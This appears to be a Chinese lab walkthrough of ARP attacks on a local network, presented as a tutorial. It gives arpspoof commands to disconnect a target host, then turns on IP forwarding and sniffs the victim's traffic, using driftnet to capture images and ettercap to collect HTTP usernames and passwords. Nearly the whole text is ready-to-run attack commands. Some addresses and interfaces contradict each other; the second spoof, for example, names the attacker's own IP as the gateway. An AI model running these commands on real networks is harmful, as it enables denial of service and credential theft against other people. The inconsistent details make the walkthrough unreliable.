目标机器:
IPv4 地址 . . . . . . . . . . . . : 192.168.1.101
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . : 192.168.1.1
攻击机器:
IPv4 地址 . . . . . . . . . . . . : 192.168.1.105
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . : 192.168.1.1
1.通过arp攻击使目标主机断网:
使用工具kali linux,arpspoof
先测试目标机器网络连通性
连通性测试成功
开始进行arp断网攻击测试,命令格式:arpspoof -i 网卡 -t ip address mask
arpspoof -i eth0 -t 192.168.1.101 192.168.1.1
开始攻击目标机器
现在进行目标机器连通性测试,看是否产生效果
目标机器现在已经无法访问网络,攻击成功
2.通过arp欺骗和网络嗅探获取目标主机访问的图片信息
首先进行目标主机连通性测试
目标主机连通性测试成功
在攻击机中 开启IP路由转发(原理其实就是用于做双端口之间的流量转发的):
proc目录其实代表内存,即ip_forward是一个临时文件,用于给某此程序读取的。设置为1代表转发。重启后变回0。
echo 1 > /proc/sys/net/ipv4/ip_forward
然后再进行arp欺骗
arpspoof -i eth0 -t 192.168.1.107 192.168.1.105
进行arp欺骗成功,目标主机可以访问网络
使用driftnet工具进行流量嗅探,可以嗅探到目标主机的部分图片
driftnet -i wlan0
使用ettercap工具来进行流量嗅探,获取http中的账号和密码
ettercap -Tq -i eth0